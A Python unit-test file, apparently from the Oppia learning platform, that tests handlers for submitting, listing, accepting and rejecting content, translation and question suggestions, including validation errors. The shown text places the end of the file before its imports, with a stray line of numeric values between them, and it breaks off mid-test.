suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']),
{'action': 'invalid_action'}, csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid action.')
self.logout()
def test_reject_suggestion_to_skill(self):
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_reject = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_reject['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_IN_REVIEW)
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
self.put_json('%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_reject['target_id'],
suggestion_to_reject['suggestion_id']), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token)
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_reject['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_REJECTED)
self.logout()
def test_accept_suggestion_to_skill(self):
self.login(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_accept['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_IN_REVIEW)
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
self.put_json('%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted!',
'skill_id': self.skill_id
}, csrf_token=csrf_token)
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_accept['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_ACCEPTED)
self.logout()
def test_reviewer_accept_suggestion_to_skill(self):
self.login(self.REVIEWER_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_accept['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_IN_REVIEW)
csrf_token = self.get_new_csrf_token()
with self.swap(constants, 'ENABLE_NEW_STRUCTURE_VIEWER_UPDATES', True):
self.put_json('%s/skill/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message': u'commit message',
'review_message': u'Accepted!',
'skill_id': self.skill_id
}, csrf_token=csrf_token)
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_accept['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_ACCEPTED)
self.logout()
class UserSubmittedSuggestionsHandlerTest(test_utils.GenericTestBase):
"""Unit test for the UserSubmittedSuggestionsHandler."""
AUTHOR_EMAIL = 'author@example.com'
def setUp(self):
super(UserSubmittedSuggestionsHandlerTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.signup(self.AUTHOR_EMAIL, 'author')
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
self.TOPIC_ID = 'topic'
self.STORY_ID = 'story'
self.EXP_ID = 'exp1'
# Needs to be 12 characters long.
self.SKILL_ID = 'skill1234567'
self.SKILL_DESCRIPTION = 'skill to link question to'
exploration = self.save_new_valid_exploration(
self.EXP_ID, self.owner_id, title='Exploration title',
category='Algebra', end_state_name='End State',
correctness_feedback_enabled=True)
self.publish_exploration(self.owner_id, self.EXP_ID)
topic = topic_domain.Topic.create_default_topic(
self.TOPIC_ID, 'topic', 'abbrev', 'description')
topic.thumbnail_filename = 'thumbnail.svg'
topic.thumbnail_bg_color = '#C6DCDA'
topic.subtopics = [
topic_domain.Subtopic(
1, 'Title', ['skill_id_333'], 'image.svg',
constants.ALLOWED_THUMBNAIL_BG_COLORS['subtopic'][0],
'dummy-subtopic-three')]
topic.next_subtopic_id = 2
topic_services.save_new_topic(self.owner_id, topic)
topic_services.publish_topic(self.TOPIC_ID, self.admin_id)
story = story_domain.Story.create_default_story(
self.STORY_ID, 'A story', 'Description', self.TOPIC_ID, 'story-a')
story_services.save_new_story(self.owner_id, story)
topic_services.add_canonical_story(
self.owner_id, self.TOPIC_ID, self.STORY_ID)
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.admin_id)
story_services.update_story(
self.owner_id, self.STORY_ID, [story_domain.StoryChange({
'cmd': 'add_story_node',
'node_id': 'node_1',
'title': 'Node1',
}), story_domain.StoryChange({
'cmd': 'update_story_node_property',
'property_name': 'exploration_id',
'node_id': 'node_1',
'old_value': None,
'new_value': self.EXP_ID
})], 'Changes.')
self.save_new_skill(
self.SKILL_ID, self.owner_id, description=self.SKILL_DESCRIPTION)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.reviewer_id = self.editor_id
self.set_admins([self.ADMIN_USERNAME])
self.editor = user_services.UserActionsInfo(self.editor_id)
# Login and create exploration and suggestions.
self.login(self.EDITOR_EMAIL)
exp_services.update_exploration(
self.owner_id, self.EXP_ID, [
exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'Introduction',
'new_value': {
'content_id': 'content',
'html': '<p>new content html</p>'
}
})], 'Add content')
self.logout()
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT),
'target_type': (feconf.ENTITY_TYPE_EXPLORATION),
'target_id': self.EXP_ID,
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_ADD_TRANSLATION,
'state_name': 'Introduction',
'content_id': 'content',
'language_code': 'hi',
'content_html': '<p>new content html</p>',
'translation_html': '<p>new content html in Hindi</p>'
},
'description': 'Adds translation',
}, csrf_token=csrf_token)
self.question_dict = {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': [self.SKILL_ID],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
}
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': None,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token)
self.logout()
def test_exploration_handler_returns_data(self):
self.login(self.AUTHOR_EMAIL)
response = self.get_json(
'/getsubmittedsuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
response = self.get_json(
'/getsubmittedsuggestions/topic/translate_content')
self.assertEqual(response, {})
def test_skill_handler_returns_data(self):
self.login(self.AUTHOR_EMAIL)
response = self.get_json(
'/getsubmittedsuggestions/skill/add_question')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
response = self.get_json(
'/getsubmittedsuggestions/topic/add_question')
self.assertEqual(response, {})
def test_question_suggestions_data_for_deleted_opportunities(self):
self.login(self.AUTHOR_EMAIL)
opportunity_services.delete_skill_opportunity(self.SKILL_ID)
response = self.get_json(
'/getsubmittedsuggestions/skill/add_question')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
self.assertEqual(
response['target_id_to_opportunity_dict'][self.SKILL_ID], None)
def test_translation_suggestions_data_for_deleted_opportunities(self):
self.login(self.AUTHOR_EMAIL)
opportunity_services.delete_exploration_opportunities([self.EXP_ID])
response = self.get_json(
'/getsubmittedsuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
self.assertEqual(
response['target_id_to_opportunity_dict'][self.EXP_ID], None)
def test_handler_with_invalid_suggestion_type_raise_error(self):
self.login(self.AUTHOR_EMAIL)
response = self.get_json(
'/getsubmittedsuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.get_json(
'/getsubmittedsuggestions/exploration/invalid_suggestion_type',
expected_status_int=400)
def test_handler_with_invalid_target_type_raise_error(self):
self.login(self.AUTHOR_EMAIL)
response = self.get_json(
'/getsubmittedsuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.get_json(
'/getsubmittedsuggestions/invalid_target_type'
'/translate_content', expected_status_int=400)
class ReviewableSuggestionsHandlerTest(test_utils.GenericTestBase):
"""Unit test for the ReviewableSuggestionsHandler."""
def setUp(self):
super(ReviewableSuggestionsHandlerTest, self).setUp()
self.AUTHOR_EMAIL = 'author@example.com'
self.REVIEWER_EMAIL = 'reviewer@example.com'
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.signup(self.AUTHOR_EMAIL, 'author')
self.signup(self.REVIEWER_EMAIL, 'reviewer')
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.reviewer_id = self.get_user_id_from_email(self.REVIEWER_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
self.editor = user_services.UserActionsInfo(self.editor_id)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.TOPIC_ID = 'topic'
self.STORY_ID = 'story'
self.EXP_ID = 'exp1'
# Needs to be 12 characters long.
self.SKILL_ID = 'skill1234567'
self.SKILL_DESCRIPTION = 'skill to link question to'
exploration = self.save_new_valid_exploration(
self.EXP_ID, self.owner_id, title='Exploration title',
category='Algebra', end_state_name='End State',
correctness_feedback_enabled=True)
self.publish_exploration(self.owner_id, self.EXP_ID)
topic = topic_domain.Topic.create_default_topic(
self.TOPIC_ID, 'topic', 'abbrev', 'description')
topic.thumbnail_filename = 'thumbnail.svg'
topic.thumbnail_bg_color = '#C6DCDA'
topic.subtopics = [
topic_domain.Subtopic(
1, 'Title', ['skill_id_333'], 'image.svg',
constants.ALLOWED_THUMBNAIL_BG_COLORS['subtopic'][0],
'dummy-subtopic-three')]
topic.next_subtopic_id = 2
topic_services.save_new_topic(self.owner_id, topic)
topic_services.publish_topic(self.TOPIC_ID, self.admin_id)
story = story_domain.Story.create_default_story(
self.STORY_ID, 'A story', 'Description', self.TOPIC_ID, 'story-b')
story_services.save_new_story(self.owner_id, story)
topic_services.add_canonical_story(
self.owner_id, self.TOPIC_ID, self.STORY_ID)
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.admin_id)
story_services.update_story(
self.owner_id, self.STORY_ID, [story_domain.StoryChange({
'cmd': 'add_story_node',
'node_id': 'node_1',
'title': 'Node1',
}), story_domain.StoryChange({
'cmd': 'update_story_node_property',
'property_name': 'exploration_id',
'node_id': 'node_1',
'old_value': None,
'new_value': self.EXP_ID
})], 'Changes.')
self.save_new_skill(
self.SKILL_ID, self.owner_id, description=self.SKILL_DESCRIPTION)
user_services.allow_user_to_review_question(self.reviewer_id)
user_services.allow_user_to_review_translation_in_language(
self.reviewer_id, 'hi')
# Login and update exploration and suggestions.
self.login(self.EDITOR_EMAIL)
exp_services.update_exploration(
self.owner_id, self.EXP_ID, [
exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'Introduction',
'new_value': {
'content_id': 'content',
'html': '<p>new content html</p>'
}
})], 'Add content')
self.logout()
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT),
'target_type': (feconf.ENTITY_TYPE_EXPLORATION),
'target_id': self.EXP_ID,
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_ADD_TRANSLATION,
'state_name': 'Introduction',
'content_id': 'content',
'language_code': 'hi',
'content_html': '<p>new content html</p>',
'translation_html': '<p>new content html in Hindi</p>'
},
'description': 'Adds translation',
}, csrf_token=csrf_token)
self.question_dict = {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': [self.SKILL_ID],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
}
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': None,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token)
self.logout()
def test_exploration_handler_returns_data(self):
self.login(self.REVIEWER_EMAIL)
response = self.get_json(
'/getreviewablesuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
response = self.get_json(
'/getreviewablesuggestions/topic/translate_content')
self.assertEqual(response, {})
def test_skill_handler_returns_data(self):
self.login(self.REVIEWER_EMAIL)
response = self.get_json(
'/getreviewablesuggestions/skill/add_question')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
response = self.get_json(
'/getreviewablesuggestions/topic/add_question')
self.assertEqual(response, {})
def test_handler_with_invalid_suggestion_type_raise_error(self):
self.login(self.REVIEWER_EMAIL)
response = self.get_json(
'/getreviewablesuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.get_json(
'/getreviewablesuggestions/exploration/invalid_suggestion_type',
expected_status_int=404)
def test_handler_with_invalid_target_type_raise_error(self):
self.login(self.REVIEWER_EMAIL)
response = self.get_json(
'/getreviewablesuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.get_json(
'/getreviewablesuggestions/invalid_target_type'
'/translate_content', expected_status_int=400)
| 41.249429
| 111
| 0.602195
|
from __future__ import absolute_import
from __future__ import unicode_literals
import os
from constants import constants
from core.domain import exp_domain
from core.domain import exp_fetchers
from core.domain import exp_services
from core.domain import feedback_services
from core.domain import fs_domain
from core.domain import opportunity_services
from core.domain import question_domain
from core.domain import question_services
from core.domain import rights_domain
from core.domain import rights_manager
from core.domain import skill_services
from core.domain import state_domain
from core.domain import story_domain
from core.domain import story_services
from core.domain import suggestion_services
from core.domain import topic_domain
from core.domain import topic_services
from core.domain import user_services
from core.platform import models
from core.tests import test_utils
import feconf
import python_utils
(suggestion_models, feedback_models) = models.Registry.import_models([
models.NAMES.suggestion, models.NAMES.feedback])
class SuggestionUnitTests(test_utils.GenericTestBase):
IMAGE_UPLOAD_URL_PREFIX = '/createhandler/imageupload'
ASSET_HANDLER_URL_PREFIX = '/assetsdevhandler'
EXP_ID = 'exp1'
TRANSLATION_LANGUAGE_CODE = 'en'
AUTHOR_EMAIL = 'author@example.com'
AUTHOR_EMAIL_2 = 'author2@example.com'
REVIEWER_EMAIL = 'reviewer@example.com'
TRANSLATOR_EMAIL = 'translator@example.com'
NORMAL_USER_EMAIL = 'user@example.com'
def setUp(self):
super(SuggestionUnitTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.signup(self.AUTHOR_EMAIL, 'author')
self.signup(self.AUTHOR_EMAIL_2, 'author2')
self.signup(self.NORMAL_USER_EMAIL, 'normalUser')
self.signup(self.REVIEWER_EMAIL, 'reviewer')
self.signup(self.TRANSLATOR_EMAIL, 'translator')
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.author_id_2 = self.get_user_id_from_email(self.AUTHOR_EMAIL_2)
self.reviewer_id = self.get_user_id_from_email(self.REVIEWER_EMAIL)
self.translator_id = self.get_user_id_from_email(self.TRANSLATOR_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
user_services.allow_user_to_review_translation_in_language(
self.reviewer_id, 'hi')
self.editor = user_services.UserActionsInfo(self.editor_id)
self.login(self.EDITOR_EMAIL)
exploration = (
self.save_new_linear_exp_with_state_names_and_interactions(
self.EXP_ID, self.editor_id, ['State 1', 'State 2', 'State 3'],
['TextInput'], category='Algebra'))
self.old_content = state_domain.SubtitledHtml(
'content', '<p>old content html</p>').to_dict()
exploration.states['State 1'].update_content(
state_domain.SubtitledHtml.from_dict(self.old_content))
exploration.states['State 2'].update_content(
state_domain.SubtitledHtml.from_dict(self.old_content))
exploration.states['State 3'].update_content(
state_domain.SubtitledHtml.from_dict(self.old_content))
exp_services._save_exploration(self.editor_id, exploration, '', [])
rights_manager.publish_exploration(self.editor, self.EXP_ID)
rights_manager.assign_role_for_exploration(
self.editor, self.EXP_ID, self.owner_id, rights_domain.ROLE_EDITOR)
self.new_content = state_domain.SubtitledHtml(
'content', '<p>new content html</p>').to_dict()
self.resubmit_change_content = state_domain.SubtitledHtml(
'content', '<p>resubmit change content html</p>').to_dict()
self.logout()
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': (
feconf.ENTITY_TYPE_EXPLORATION),
'target_id': 'exp1',
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 1',
'old_value': self.old_content,
'new_value': self.new_content
},
'description': 'change to state 1',
}, csrf_token=csrf_token)
self.logout()
self.login(self.AUTHOR_EMAIL_2)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': (
feconf.ENTITY_TYPE_EXPLORATION),
'target_id': 'exp1',
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 2',
'old_value': self.old_content,
'new_value': self.new_content
},
'description': 'change to state 2',
}, csrf_token=csrf_token)
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': (
feconf.ENTITY_TYPE_EXPLORATION),
'target_id': 'exp1',
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 3',
'old_value': self.old_content,
'new_value': self.new_content
},
'description': 'change to state 3',
}, csrf_token=csrf_token)
self.logout()
self.login(self.TRANSLATOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT),
'target_type': feconf.ENTITY_TYPE_EXPLORATION,
'target_id': 'exp1',
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_ADD_TRANSLATION,
'state_name': 'State 3',
'content_id': 'content',
'language_code': 'hi',
'content_html': '<p>old content html</p>',
'translation_html': '<p>In Hindi</p>'
},
'description': 'change to state 3',
}, csrf_token=csrf_token)
self.logout()
def test_create_suggestion(self):
self.login(self.AUTHOR_EMAIL_2)
csrf_token = self.get_new_csrf_token()
exploration = exp_fetchers.get_exploration_by_id(self.EXP_ID)
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': (
feconf.ENTITY_TYPE_EXPLORATION),
'target_id': 'exp1',
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 3',
'new_value': self.new_content
},
'description': 'change again to state 3',
}, csrf_token=csrf_token)
suggestions = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions']
self.assertEqual(len(suggestions), 3)
self.logout()
def test_create_suggestion_invalid_target_version_input(self):
self.login(self.AUTHOR_EMAIL_2)
csrf_token = self.get_new_csrf_token()
response = self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': (
feconf.ENTITY_TYPE_EXPLORATION),
'target_id': 'exp1',
'target_version_at_submission': 'invalid target version',
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 3',
'new_value': self.new_content
},
'description': 'change again to state 3',
}, csrf_token=csrf_token, expected_status_int=400)
suggestions = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions']
self.assertEqual(
response['error'],
'Expected target_version_at_submission to be an int, received <type'
' \'unicode\'>')
self.assertEqual(len(suggestions), 2)
self.logout()
def test_suggestion_to_exploration_handler_with_invalid_suggestion_id(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'], 'invalid_suggestion_id'), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'Invalid format for suggestion_id. It must contain 3 parts '
'separated by \'.\'')
csrf_token = self.get_new_csrf_token()
self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
'exploration.target_id.id'), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token,
expected_status_int=404)
self.logout()
def test_suggestion_to_exploration_handler_with_invalid_target_type(self):
self.login(self.EDITOR_EMAIL)
question_dict = {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_id'],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
}
exp_id = 'new_exp_id'
self.save_new_default_exploration(exp_id, self.editor_id)
suggestion_services.create_suggestion(
feconf.SUGGESTION_TYPE_ADD_QUESTION,
feconf.ENTITY_TYPE_TOPIC, exp_id, 1,
self.author_id, {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': question_dict,
'skill_id': None,
'skill_difficulty': 0.3
}, None)
suggestion_id = suggestion_services.query_suggestions(
[('author_id', self.author_id), (
'target_id', exp_id)])[0].suggestion_id
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX, exp_id,
suggestion_id), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'This handler allows actions only on suggestions to explorations.')
self.logout()
def test_suggestion_to_exploration_handler_with_invalid_target_id(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
self.save_new_default_exploration('exp_id', self.editor_id)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX, 'exp_id',
suggestion_to_accept['suggestion_id']), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'The exploration id provided does not match the exploration id '
'present as part of the suggestion_id')
self.logout()
def test_owner_of_exploration_cannot_repond_to_own_suggestion(self):
self.login(self.EDITOR_EMAIL)
exp_id = 'new_exp_id'
self.save_new_default_exploration(exp_id, self.editor_id)
new_content = state_domain.SubtitledHtml(
'content', '<p>new content html</p>').to_dict()
change_cmd = {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 1',
'new_value': new_content
}
suggestion_services.create_suggestion(
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT,
feconf.ENTITY_TYPE_EXPLORATION, exp_id, 1,
self.editor_id, change_cmd, 'sample description')
suggestion_id = suggestion_services.query_suggestions(
[('author_id', self.editor_id), (
'target_id', exp_id)])[0].suggestion_id
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
exp_id, suggestion_id), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token, expected_status_int=401)
self.assertEqual(
response['error'], 'You cannot accept/reject your own suggestion.')
self.logout()
def test_suggestion_to_exploration_handler_with_invalid_action(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']),
{'action': 'invalid_action'}, csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid action.')
self.logout()
def test_reject_suggestion_to_exploration(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_reject = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_reject['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_IN_REVIEW)
csrf_token = self.get_new_csrf_token()
self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_reject['target_id'],
suggestion_to_reject['suggestion_id']), {
'action': u'reject',
'review_message': u'Rejected!'
}, csrf_token=csrf_token)
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_reject['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_REJECTED)
self.logout()
def test_suggestion_to_exploration_handler_with_long_commit_mesage(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
csrf_token = self.get_new_csrf_token()
response = self.put_json('%s/exploration/%s/%s' % (
feconf.SUGGESTION_ACTION_URL_PREFIX,
suggestion_to_accept['target_id'],
suggestion_to_accept['suggestion_id']), {
'action': u'accept',
'commit_message':
u'a' * (feconf.MAX_COMMIT_MESSAGE_LENGTH + 1),
'review_message': u'Accepted'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'Commit messages must be at most 1000 characters long.'
)
def test_accept_suggestion(self):
exploration = exp_fetchers.get_exploration_by_id(self.EXP_ID)
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id))['suggestions'][0]
enable_recording_of_scores_swap = self.swap(
feconf, 'ENABLE_RECORDING_OF_SCORES', True)
